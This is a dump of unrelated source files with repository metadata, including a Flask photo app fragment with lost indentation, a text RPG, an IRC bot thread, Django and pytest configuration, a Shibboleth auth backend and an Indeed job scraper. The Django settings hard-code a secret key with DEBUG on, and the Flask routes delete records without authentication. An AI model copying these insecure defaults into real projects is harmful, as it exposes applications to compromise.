    return sqlite3.connect(app.config['DATABASE'])
@app.route("/")
def index():
pList = g.db.execute('select resouces.id,pid,resouces.tid,threads.location,uid from resouces left join threads on threads.tid = resouces.tid where deleted=? order by resouces.id desc limit 20',(session["deleted"],)).fetchall()
return render_template('index.html',pList = pList)
@app.route("/loadMore/<id>")
def loadMore(id):
pList = g.db.execute('select resouces.id,pid,resouces.tid,threads.location,uid from resouces left join threads on threads.tid = resouces.tid where resouces.id<? and deleted=? order by resouces.id desc limit 20',(id,session["deleted"]))
return json.dumps(pList.fetchall())
@app.route("/photo/<pid>")
def loadPhoto(pid):
if os.path.exists('../images/w300'+pid)==False:
im = Image.open('../images/'+pid)
oW = im.size[0]
oH = im.size[1]
cim = im.resize((300,oH*300/oW))
cim.save('../images/w300'+pid)
return send_file('../images/w300'+pid, mimetype='image/jpg')
@app.route("/search/<keyword>")
def search(keyword):
pList = g.db.execute('select resouces.id,pid,resouces.tid,threads.location,uid from resouces left join threads on threads.tid = resouces.tid where location like ? and deleted=? order by resouces.id desc limit 20',('%'+keyword+'%',session["deleted"])).fetchall()
return render_template('search.html',pList = pList,keyword = keyword)
@app.route("/search/<keyword>/loadMore/<id>")
def searchLoadMore(keyword,id):
pList = g.db.execute('select resouces.id,pid,resouces.tid,threads.location,uid from resouces left join threads on threads.tid = resouces.tid where resouces.id<? and location like ? and deleted=? order by resouces.id desc limit 20',(id,'%'+keyword+'%',session["deleted"])).fetchall()
return json.dumps(pList)
@app.route("/photo/<pid>/delete")
def deletePhoto(pid):
g.db.execute('update resouces set deleted = 2 where pid=?',(pid,));
g.db.commit()
return json.dumps({"msg":"success"})
@app.route("/adv/<deleted>")
def adv(deleted):
session["deleted"] = int(deleted);
return redirect('/')
@app.before_request
def before_request():
    """Open a per-request DB connection and default the session's
    'deleted' visibility filter to 0 (show non-deleted photos)."""
    g.db = connect_db()
    # Bug/idiom fix: dict.has_key() is Python-2-only (removed in Python 3);
    # the membership test works on both and on Flask's session object.
    if "deleted" not in session:
        session["deleted"] = 0
@app.teardown_request
def teardown_request(exception):
    """Close the per-request DB connection, even when the request errored."""
    db = getattr(g, 'db', None)
    if db is not None:
        db.close()
if __name__ == "__main__":
app.run(host = app.config['HOST'],port = app.config['PORT'])
| [
"yanan.xyn@alibaba-inc.com"
] | yanan.xyn@alibaba-inc.com |
7240fc84a515b8a73bc21daa1816e17899460734 | 8a6031c0cfa18c4b4d371f0b0bb434f01f62c48c | /RPGGamePython.py | 8de45480e50b919aafbe76e070a3467c03364949 | [] | no_license | jtroina8/python_game | ce4252d312639d3ed9a92c1bae4e112c8ddd07c5 | 914717b147fbb004d33bdb8def98582676961651 | refs/heads/main | 2023-03-25T07:33:42.258238 | 2021-03-20T19:05:16 | 2021-03-20T19:05:16 | 349,578,992 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,316 | py | import random
def story():
    """Run the whole RPG: intro banner, then best-of turn-based combat
    against the Demon Knight until the player declines a rematch.

    Both combatants start at 1000 HP; each turn a move is chosen (player by
    prompt, enemy by a simple health-based heuristic), with a 20% miss
    chance, and damage/heal amounts are re-rolled every round.
    """
    print('''
         _,.
       ,` -.)
      ( _/-\\-._
     /,|`--._,-^|            ,
     \_| |`-._/||          ,'|
       |  `-, / |         /  /
       |     || |        /  /
        `r-._||/   __   /  /        Greetings, Holy Knight!
__,-<_     )`-/  `./  /             Welcome to the Kingdom of Pythoon!
'  \   `---'   \   /  /             A kingdom that's perfect for beginners.
    |           |./  /
    /           //  /               Beware! The Demon Knight is invading!
\_/' \         |/  /                Please take your holy sword, Excalibur,
 |    |   _,^-'/  /                 and eliminate this threat!
 |    , ``  (\/  /_
  \,.->._    \X-=/^                 ~Best of luck~
  (  /   `-._//^`
   `Y-.____(__}
    |     {__)
          ()
    ''')
    play_again = True
    # Set up the play again loop
    while play_again:
        winner = None
        player_health = 1000
        enemy_health = 1000
        # determine whose turn it is
        turn = random.randint(1, 2)  # heads or tails
        if turn == 1:
            player_turn = True
            enemy_turn = False
            print("\nYou strike first. Swing it like you mean it!")
        else:
            player_turn = False
            enemy_turn = True
            print("\nDemon Knight sneaks up on you. Watch out!")
        print(f'''
    Player Health: {player_health}
    Enemy Health: {enemy_health}
    ''')
        # set up the main game loop
        # (the breaks below end the fight; this condition alone never goes false)
        while (player_health != 0 or enemy_health != 0):
            # determine if heal has been used by the player. Resets false each loop.
            heal_up = False
            miss = False  # determine if the chosen move will miss.
            # create a dictionary of the possible moves and randomly select the damage it does when selected
            moves = {"Excalibur": random.randint(150, 230),
                     "Divine Light": random.randint(100, 350),
                     "Potion": random.randint(180, 270)}
            if player_turn:
                print('''Choose your next move:
            (1) Excalibur (Deals 150-230 Damage)
            (2) Divine Light (Deals 100-350 Damage)
            (3) Potion (Restores 180-270 Health)
            ''')
                player_move = int(input("> ").lower())
                move_miss = random.randint(1, 5)  # 20% of missing
                if move_miss == 1:
                    miss = True
                else:
                    miss = False
                if miss:
                    player_move = 0  # player misses and deals no damage
                    print("\nTides turn for the worse: You missed!")
                else:
                    if player_move == (1):
                        player_move = moves["Excalibur"]
                        print("\nYou swing your mighty sword, Excalibur. It deals %s damage." % (
                            player_move))
                    elif player_move == (2):
                        player_move = moves["Divine Light"]
                        print("\nYou call to the heavens to show its Divine Light! It deals %s damage." % (
                            player_move))
                    elif player_move == (3):
                        heal_up = True  # heal activated
                        player_move = moves["Potion"]
                        print("\nYou chug a Potion and throw the bottle in the reycling bin. It heals %s damage." % (
                            player_move))
                    else:
                        print(
                            "\nINVALID ENTRY! Please choose using the numbers: 1, 2, or 3")
                        continue
            else:  # computer turn
                move_miss = random.randint(1, 5)
                if move_miss == 1:
                    miss = True
                else:
                    miss = False
                if miss:
                    enemy_move = 0  # the computer misses and deals no damage
                    print("\nThe gods have blessed you! Your opponent misses!")
                else:
                    # Enemy AI: re-uses the same damage table; the flavor text
                    # differs from the player's move names on purpose.
                    if enemy_health > 300:
                        if player_health > 750:
                            enemy_move = moves["Excalibur"]
                            print("\nDemon Knight swings her Devilish Dagger. It deals %s damage." % (
                                enemy_move))
                        elif player_health > 350 and player_health <= 750:  # computer decides whether to go big or play it safe
                            imoves = ["Excalibur", "Divine Light"]
                            imoves = random.choice(imoves)
                            enemy_move = moves[imoves]
                            print("\nDemon Knight uses %s. It deals %s damage" %
                                  (imoves, enemy_move))
                        elif player_health <= 350:
                            enemy_move = moves["Divine Light"]  # FINISH HIM!
                            print("\nDemon Knight opens the ground and releases Hellfire. It deals %s damage." % (
                                enemy_move))
                    else:  # if the computer has less than 300 health, there is a 50% chance they will heal
                        heal_or_fight = random.randint(1, 2)
                        if heal_or_fight == 1:
                            heal_up = True
                            enemy_move = moves["Potion"]
                            print(
                                "\nDemon Knight uses a bandage. It heals %s damage." % (enemy_move))
                        else:
                            if player_health > 750:
                                enemy_move = moves["Excalibur"]
                                print("\nDemon Knight swings her Devilish Dagger. It deals %s damage." % (
                                    enemy_move))
                            elif player_health > 350 and player_health <= 750:
                                imoves = ["Excalibur", "Divine Light"]
                                imoves = random.choice(imoves)
                                enemy_move = moves[imoves]
                                print("\nDemon Knight uses %s and deals %s " %
                                      (imoves, enemy_move))
                            elif player_health <= 350:
                                # FINISH HIM!
                                enemy_move = moves["Divine Light"]
                                print("\nDemon Knight opens the ground and releases Hellfire. It deals %s damage." % (
                                    enemy_move))
            # Apply the chosen move: heals go to the mover (capped at 1000),
            # damage goes to the opponent (floored at 0, which ends the fight).
            if heal_up:
                if player_turn:
                    player_health += player_move
                    if player_health > 1000:
                        player_health = 1000  # cap max health at 1000. No over healing!
                else:
                    enemy_health += enemy_move
                    if enemy_health > 1000:
                        enemy_health = 1000
            else:
                if player_turn:
                    enemy_health -= player_move
                    if enemy_health < 0:
                        enemy_health = 0  # cap minimum health at 0
                        winner = "Player"
                        break
                else:
                    player_health -= enemy_move
                    if player_health < 0:
                        player_health = 0
                        winner = "Enemy"
                        break
            print(f'''
    Player Health: {player_health}
    Enemy Health: {enemy_health}
    ''')
            # switch turns
            player_turn = not player_turn
            enemy_turn = not enemy_turn
        # once main game while loop breaks, determine winner and congratulate
        if winner == "Player":
            print("\nWe have a Champion! You've defeated Demon Knight, saved the kingdom, and the King gave you a discount on your taxes. Nice!")
        else:
            print("\nYou have fallen in battle. The land is in ruins... Shucks.")
        print("\nGo for another round? (Y/N)")
        answer = input("> ").lower()
        if answer not in ("yes", "y"):
            play_again = False
story()
| [
"jtroinacoding@gmail.com"
] | jtroinacoding@gmail.com |
7b0a346a7c56723dcae34715480a4cc1df0a10b2 | 91d931581891ca2f21403090f8192296f11bf6f4 | /utils/threads.py | 24c5e0fc538d7d94d6b76021c4c081fe55003fb1 | [
"MIT"
] | permissive | svkampen/James | b496e22b218cefa8b419099cf8cb8a7f5aa1c761 | dc2f6df19aeb8278ef5aabc2956e225f3234d693 | refs/heads/master | 2021-01-02T09:38:23.158331 | 2018-07-01T02:07:36 | 2018-07-01T02:07:36 | 3,297,746 | 0 | 1 | null | 2015-04-19T15:24:32 | 2012-01-29T15:13:35 | Python | UTF-8 | Python | false | false | 1,193 | py | """
Threads module
"""
from threading import Thread
from queue import Queue
import traceback
import sys
class HandlerThread(Thread):
    """Worker thread that executes queued IRC command handlers for *bot*.

    Handlers are submitted via :meth:`handle`; any exception a handler
    raises is reported to the originating channel as a stylized
    "guru meditation" message.
    """
    def __init__(self, bot):
        self.bot = bot
        self.queue = Queue()
        super().__init__()
    def guru_meditate(self, chan, exc_info):
        """Format the (type, value, traceback) triple and send it to *chan*.

        NOTE(review): fragile parsing — splitting str(exc_type) on quotes,
        and exc_info[1].args[0] raises IndexError for no-arg exceptions.
        """
        exc_name = str(exc_info[0]).split("'")[1]
        exc_args = exc_info[1].args[0]
        exc_traceback = exc_info[2]
        outp = traceback.format_tb(exc_traceback)
        # Pull the line number and the last two path components of the file
        # from the innermost traceback frame's formatted text.
        lineno = outp[-1].split(', ')[1][5:]
        file = ' '.join(outp[-1].split('"')[1].rsplit("/", 2)[-2:])
        # \x02/\x03 are mIRC bold/color control codes — keep byte-exact.
        out = "⌜ \x02\x03such \x034%s \x03so \x034%s\x03\x02 in \x034%s\x03 \x02line\x0304 %s\x03\x02 ⌟" % (
            exc_name, exc_args, file, lineno)
        self.bot.msg(chan, out)
    def run(self):
        """Forever pull callables off the queue and invoke them.

        Assumes each queued callable is partial-like with ``.args[2]`` being
        the channel name (TODO confirm against the submitter).  SystemExit
        is swallowed silently; every other exception is printed and reported
        to the channel.
        """
        while True:
            try:
                func = self.queue.get()
                func_chan = func.args[2]
                func()
            except BaseException as e:
                if not isinstance(e, SystemExit):
                    traceback.print_exc()
                    # NOTE(review): func_chan may be unbound here if
                    # queue.get()/args access itself raised.
                    self.guru_meditate(func_chan, sys.exc_info())
    def handle(self, function):
        """Enqueue *function* for execution on this thread."""
        self.queue.put(function)
| [
"sam@tehsvk.net"
] | sam@tehsvk.net |
a6573a47a9197fa74a3b1d54ce847a70a26f6592 | 01e8e67466b79d352d979ae24fc861be7e9b8b48 | /backup_brain/wsgi.py | 936fb7b14f5cc3ad36354ed46e08a9536770da59 | [] | no_license | lucasousa/backup-brain | dcc2316d5236716ec821afb4489a87fcd1c5500a | a68ee46de4463b22fb23e075d89db465a247649b | refs/heads/master | 2022-12-23T22:18:10.629705 | 2020-10-04T19:24:35 | 2020-10-04T19:24:35 | 281,097,015 | 5 | 2 | null | 2020-10-04T19:24:36 | 2020-07-20T11:23:26 | null | UTF-8 | Python | false | false | 401 | py | """
WSGI config for backup_brain project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
# Point Django at the project settings module before the application is built.
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'backup_brain.settings')
# Module-level WSGI callable picked up by WSGI servers (gunicorn, uWSGI, ...).
application = get_wsgi_application()
| [
"marcosbarretopaulo@gmail.com"
] | marcosbarretopaulo@gmail.com |
11d98c74eb38bbdb8bdd909712e62ed68d864dc5 | 0030e377308cdbcf520575670e18050a23bd2bd4 | /homework_classes.py | 60fba6d9379b99b8cd73e3e8ff602a3977d29f2e | [] | no_license | xx70x/py-16_hw | 5b629d8a5d2530bdccee146e0f28f8cfc6a968aa | 3941d88930cf52bddcc4c3aa1c5b5c178344acf7 | refs/heads/master | 2020-03-18T18:10:43.304878 | 2018-05-27T19:34:56 | 2018-05-27T19:34:56 | 135,075,685 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,252 | py | # Необходимо реализовать классы животных на ферме:
# Коровы, козы, овцы, свиньи;
# Утки, куры, гуси.
# Условия:
# Должен быть один базовый класс, который наследуют все остальные животные.
# Базовый класс должен определять общие характеристики и интерфейс.
class Fauna():
    """Base class for farm animals: stores a name and a size category."""

    def __init__(self, name, size):
        """Remember the animal's name and size category, then announce it."""
        self.name, self.size = name, size
        print(self.name, self.size)
class Birds(Fauna):
    """Farm birds; every bird is registered with the 'small' size category."""

    # Class-level catalogue of the bird kinds kept on the farm.
    name_bird = ['Утки', 'Куры', 'Гуси']

    def __init__(self, name_bird):
        """Store the bird kind and initialise the Fauna base as 'small'."""
        self.name_bird = name_bird
        super().__init__(name_bird, 'small')
class Animal(Fauna):
    """Farm livestock; every animal is registered with the 'big' size category."""

    # Class-level catalogue of the livestock kinds kept on the farm.
    name_animal = ['Коровы', 'Козы', 'Овцы', 'Свиньи']

    def __init__(self, name_animal):
        """Store the animal kind and initialise the Fauna base as 'big'."""
        self.name_animal = name_animal
        super().__init__(name_animal, 'big')
# Create one representative of each bird and livestock kind.
ducks = Birds('Утки')
chickens = Birds('Куры')
geese = Birds('Гуси')
Cows = Animal('Коровы')
Goats = Animal('Козы')
Sheep = Animal('Овцы')
Pigs = Animal('Свиньи')
# Homework still in progress (original note: "ДЗ пока не готово").
| [
"xx70x@ya.ru"
] | xx70x@ya.ru |
4749a3c0908091555e12a2d95d89a42aa01f83f6 | b1571f4ee376d789b8094777fd81c4fb47a89cf1 | /AtCoder/練習/Beginners Selection/ABC087B.py | 23846c48ce3cc1eb755514d5511a6d7951002ae6 | [] | no_license | hiroyaonoe/Competitive-programming | e49e43f8853602ba73e658cab423bd91ebbe9286 | 2949e10eec3a38498bedb57ea41a2491916bab1c | refs/heads/master | 2021-06-23T21:56:33.232931 | 2021-05-30T15:27:31 | 2021-05-30T15:27:31 | 225,863,783 | 2 | 0 | null | 2020-06-14T17:54:28 | 2019-12-04T12:37:24 | Python | UTF-8 | Python | false | false | 595 | py | a=int(input())
b=int(input())
c=int(input())
x=int(input())
cnt=0
for i in range(a+1):
for j in range(b+1):
for k in range(c+1):
if x == 500*i+100*j+50*k:cnt+=1
print(cnt)
'''
coinA=min(a,x//500)
coinB=min(b,(x-coinA*500)//100)
coinC=min(c,(x-coinB*100)//50)
cnt=0
changeB=coinB
changeC=coinC
if 500*coinA+100*coinB+50*coinC>=x:
while coinA>=0:
while 0<=changeB<=b:
if 0<=changeC<=c:
cnt+=1
changeB-=1
changeC+=2
changeB=coinB
changeC=coinC
coinA-=1
changeB+=5
print(cnt)
''' | [
"onoehiroya@gmail.com"
] | onoehiroya@gmail.com |
ae7f384939e787900d1895652f876198cc9cf37a | c3fc7e1c2e20455c6913b545bb67af55a7fb7099 | /selector/authbackend.py | 1f106c555174569d29625f8e83d214660b5afb3a | [
"MIT"
] | permissive | mpassid/MPASSid-connect | aeb64f66804419dd2e70f6bf76aedb422b607ce2 | 61fafe0ffe02e8fa363473afd261dd5bc48aa9af | refs/heads/master | 2021-05-26T05:14:28.591716 | 2019-02-13T10:11:15 | 2019-02-13T10:11:15 | 127,510,036 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,182 | py | # -*- encoding: utf-8 -*-
# The MIT License (MIT)
#
# Copyright (c) 2015 Haltu Oy, http://haltu.fi
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
# THE SOFTWARE.
#
import logging
from django.contrib.auth.backends import ModelBackend
from selector.models import User
from selector import settings
LOG = logging.getLogger(__name__)
class ShibbolethBackend(ModelBackend):
    """Authenticate users from MPASS/Shibboleth attributes found in request.META."""

    def authenticate(self, **credentials):
        """Return the User matching the MPASS OID, or None.

        When the user does not exist yet and ``settings.CREATE_SAML_USER``
        is enabled, a new User is created from the MPASS name attributes.
        """
        if 'request_meta' not in credentials:
            return None
        meta = credentials['request_meta']
        if 'HTTP_MPASS_OID' not in meta:
            LOG.debug('no HTTP_MPASS_OID in request.META')
            return None
        uid = meta['HTTP_MPASS_OID']
        LOG.debug('ShibbolethBackend.authenticate',
                  extra={'data': {'uid': uid}})
        try:
            # TODO Check also the organisation
            return User.objects.get(username=uid)
        except User.DoesNotExist:
            if not settings.CREATE_SAML_USER:
                return None
            return User.objects.create(
                username=uid,
                first_name=meta.get('HTTP_MPASS_GIVENNAME', None),
                last_name=meta.get('HTTP_MPASS_SURNAME', None),
            )
| [
"raine.rapo@gmail.com"
] | raine.rapo@gmail.com |
850406838a65e0394c64895605227d65b25e1812 | 70d35bcad8c3fc4aadfd5895e3e7c5909f667c7e | /mysite/mysite/settings.py | c2253d8a5124222d0d1ef82bb46196a4f2904f5c | [] | no_license | orestispanago/Django-rest | 06ad28fb15f50d3b08bb404c24fce8ba7913842f | 1429d809d16cb441df67ab7165e8835e107ba54a | refs/heads/master | 2023-02-04T05:42:56.147913 | 2020-12-29T10:40:13 | 2020-12-29T10:40:13 | 324,542,400 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,114 | py | """
Django settings for mysite project.
Generated by 'django-admin startproject' using Django 3.1.4.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): the secret key is committed in source; production deployments
# should load it from the environment instead of hard-coding it here.
SECRET_KEY = 'i+9tdysw=s(2i#(sf_1fus8e=*y=^s&1-8=wxu@5e@!*%%k^0-'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# An empty list is only usable while DEBUG is True; production must list
# the hostnames this site is served from.
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'rest_framework',
'myapi.apps.MyapiConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'mysite.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'mysite.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': BASE_DIR / 'db.sqlite3',
}
}
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
| [
"orestispanago@gmail.com"
] | orestispanago@gmail.com |
aea56583114181ae10f2a4ede81ab4a9348b68c7 | 7e921c186c5bb76ecdec53c23c93ab1a815ef435 | /tests/conftest.py | d26f569f209311ddda9c845b2ebb5586750b283a | [] | no_license | Serufim/yandex_backend | 7db419719a57f0f44b7522d9e58497d9db4e1992 | f85a278f956f3a660ce9edcc4e6e5571bd5a18a2 | refs/heads/master | 2020-07-05T05:32:47.401299 | 2019-08-19T19:28:11 | 2019-08-19T19:28:11 | 202,538,684 | 0 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,344 | py | import pytest
from api.app import init_app
from api.settings import BASE_DIR, get_config
from init_db import (
setup_db,
teardown_db,
create_tables,
drop_tables,
sample_data
)
TEST_CONFIG_PATH = BASE_DIR / 'config' / 'api_test.yaml'
@pytest.fixture
async def cli(loop, aiohttp_client, db):
    """aiohttp test client bound to the app started with the test config."""
    app = await init_app(['-c', TEST_CONFIG_PATH.as_posix()])
    return await aiohttp_client(app)


@pytest.fixture(scope='module')
def db():
    """Create the test Postgres database once per module; tear it down after."""
    test_config = get_config(['-c', TEST_CONFIG_PATH.as_posix()])
    setup_db(test_config['postgres'])
    yield
    teardown_db(test_config['postgres'])


@pytest.fixture
def tables_and_data():
    """Per-test schema populated with sample data; tables dropped on teardown."""
    create_tables()
    sample_data()
    yield
    drop_tables()
@pytest.fixture(params=[
    ("citizen_id", [-1, None, 'test']),
    ("apartment", [-1, None, 'test']),
    ("town", ["", 1, None]),
    ("street", ["", 1, None]),
    ('aliens', ["All your base are belong to us"]),
    # NOTE(review): unlike the other entries this value is a bare string,
    # not a list of bad values -- confirm the consuming test expects that.
    ('birth_date', '31.22.2015'),
    ("building", ["", 1, None]),
    ("gender", ["Трансформер"]),
    ("relatives", [[2, 3, 1]],),
    ("relatives", [[3]]),
    ("relatives", [[2, 3, 500]]),
    ("relatives", [[]]),
    ])
async def param_test_insert_and_update(request):
    """Invalid (field, values) pairs for citizen insert/update requests.

    (Translated from the original Russian docstring: "Test data set for
    inserting users".)
    """
    return request.param
| [
"serufim97@yandex.ru"
] | serufim97@yandex.ru |
a5211b078bee3486f2f0f8630b3c79b6da2509ae | a89d97dca06d11db19d63c05922ca18506931a5e | /medibloc_coding_1.py | f3caeadedb77844c0ae70f056e8e81b2340372ed | [] | no_license | felixdies/leetcode | 18c4bf8a28dc2fa1c78ab5f917405e0bf7058cc2 | dbb51646880def3a69c313a1992ef03946839aaf | refs/heads/master | 2020-03-24T13:33:59.238126 | 2018-07-31T03:44:22 | 2018-07-31T03:44:22 | 142,746,961 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 719 | py | """
2018.07.30
메디블록 코딩 인터뷰 1번 문제
홀수 마방진 그리기
인터뷰 때에는 checkEdge(), next() 함수를 분리 하지 않고
하나의 스크립트로 짜려고 시도하면서 긴 시간을 소요했고,
결과 코드도 깔끔하지 못했음.
"""
# Magic-square dimensions; this construction requires odd side lengths.
W = 11
H = 11
# H x W grid initialised to 0; 0 marks an unfilled cell.
ans = [[0]*W for x in range(H)]
def checkEdge(i,j):
    """Wrap (i, j) around the grid edges: row -1 wraps to the bottom row, column W wraps to 0."""
    wrapped_i = H - 1 if i == -1 else i
    wrapped_j = 0 if j == W else j
    return (wrapped_i, wrapped_j)
def next(i,j):
    """Return the next cell to fill: up-right (with wrap) if free, otherwise one step left."""
    # NOTE: this intentionally keeps the original name even though it
    # shadows the builtin next(); the script below calls it by this name.
    up_right = checkEdge(i - 1, j + 1)
    if ans[up_right[0]][up_right[1]] != 0:
        # The up-right cell is already filled: fall back to the cell
        # left of the current one (wrapped).
        return checkEdge(i, j - 1)
    return up_right
# Start in the middle of the right-most column (a rotated variant of the
# classic Siamese construction, which starts at the top middle).
i=H//2
j=W-1
num=1
# Place 1..W*H, moving up-right with wrap-around, or one step left when
# the target cell is already occupied (see next()).
while num<=W*H:
    ans[i][j] = num
    i, j = next(i, j)
    num += 1
# Print each row's sum; for a magic square these should all be equal.
for a in ans: print(sum(a))
for a in ans:
    print(a)
| [
"johnpark@ebay.com"
] | johnpark@ebay.com |
c3d4af16874f5a1eb418edd5730a4ef05849e80f | aa4b225b20c4ef6fbb8dea7c97f94d7e2185078b | /indeed.py | b19077405475abe12cbb9a7363cf7e856a7f5324 | [] | no_license | joe-habel/IndeedScraperGUI | 2436baed8d60044fb369063f6c1820fa30e4ad60 | 5f7169d8ef7d165c54622f09400d92c8b5835eb8 | refs/heads/master | 2020-04-16T04:54:57.412041 | 2019-01-11T21:24:13 | 2019-01-11T21:24:13 | 165,286,116 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,215 | py | import requests
from bs4 import BeautifulSoup
import time
class job_posting(object):
    """A single Indeed job posting: title, company, location, age and link."""

    def __init__(self, title, company, loc, date, link):
        """Store the posting fields; *link* is a relative href made absolute."""
        self.title = title
        self.company = company
        self.loc = loc
        self.date = date
        # Indeed result pages carry site-relative hrefs; prefix the site root.
        self.link = 'https://www.indeed.com/' + link

    def to_dict(self):
        """Return the posting as a plain dict with display-friendly keys."""
        return {'Title': self.title,
                'Company': self.company,
                'Location': self.loc,
                'Date': self.date,
                'Link': self.link}
def generate_url(position, location=None, state=None):
    """Build an Indeed job-search URL for *position*, optionally scoped to a city/state.

    The returned URL ends with 'start=' so a result offset can be appended
    (see get_job_postings).

    Fixes a bug in the original word-joining loop: the city loop compared
    the word index against ``len(location) - 1`` (the *character* count)
    instead of the word count, which appended a stray '+' after the city
    (e.g. 'Boston+%2C+MA' instead of 'Boston%2C+MA').
    """
    # '+'.join over split() collapses any whitespace into single '+'s.
    title = '+'.join(position.split())
    if location is not None:
        # '%2C+' is the URL-encoded ', ' separator Indeed expects.
        loc = '+'.join(location.split()) + '%2C+' + state
        url = 'https://www.indeed.com/jobs?q=%s&l=%s&start=' % (title, loc)
    else:
        url = 'https://www.indeed.com/jobs?q=%s&start=' % (title,)
    return url
def get_job_postings(url,max_results):
    """Scrape Indeed result pages and return a list of job_posting objects.

    *url* must end with 'start=' (see generate_url); Indeed paginates in
    steps of 15 results, so pages are fetched at offsets 0, 15, 30, ...
    up to *max_results*.
    """
    jobs = []
    for start in range(0, max_results, 15):
        page = requests.get(url+str(start))
        soup = BeautifulSoup(page.text, 'html.parser')
        # Small delay between requests to avoid hammering the site.
        time.sleep(.5)
        for div in soup.find_all(name='div', attrs={'class':'row'}):
            company = div.find_all(name='span', attrs={'class':'company'})
            title_link = div.find_all(name='a', attrs={'data-tn-element':'jobTitle'})
            date = div.find_all(name='span', attrs={'class':'date'})
            loc = div.find_all(name='span', attrs={'class':'location'})
            # Skip result rows missing any of the four fields (markup
            # variants without these spans).
            if len(date) < 1 or len(loc) < 1 or len(company) < 1 or len(title_link) < 1:
                continue
            else:
                jobs.append(job_posting(title_link[0].text,company[0].text.strip(),loc[0].text.strip(),date[0].text.strip(),title_link[0]['href']))
    return jobs
def get_jobs(position, location, state, max_postings):
    """Fetch up to *max_postings* Indeed postings for *position* at the given location."""
    search_url = generate_url(position, location, state)
    return get_job_postings(search_url, max_postings)
def min_to_day(minutes):
    """Convert a minute count (number or numeric string) to fractional days."""
    return float(minutes) / 1440.0
def hour_to_day(hours):
    """Convert an hour count (number or numeric string) to fractional days."""
    return float(hours) / 24.0
def sort_by_date(jobs):
    """Return *jobs* sorted newest-first based on their relative age text.

    Each job's ``date`` attribute looks like '30 minutes ago', '5 hours ago',
    '2 days ago' or '30+ days ago'. '30+ days' postings have no exact age
    and are dropped, matching the original behaviour.

    Fixes a bug in the original implementation, which keyed a dict by the
    computed age: postings with identical ages silently overwrote each
    other. All postings are now kept and the sort is stable.
    """
    aged = []
    for job in jobs:
        parts = job.date.split()
        unit = parts[1][0]
        if unit == 'm':
            # minutes -> fractional days
            age = float(parts[0]) / (60.0 * 24)
        elif unit == 'h':
            # hours -> fractional days
            age = float(parts[0]) / 24.0
        else:
            # '30+ days ago' has no exact age; skip it.
            if '+' in parts[0]:
                continue
            age = int(parts[0])
        aged.append((age, job))
    # Stable sort on age only (jobs themselves need not be comparable).
    aged.sort(key=lambda pair: pair[0])
    return [job for _, job in aged]
def job_search(position, max_postings=100, location=None, state=None):
    """Convenience wrapper: fetch postings and return them sorted newest-first."""
    return sort_by_date(get_jobs(position, location, state, max_postings))
| [
"noreply@github.com"
] | noreply@github.com |
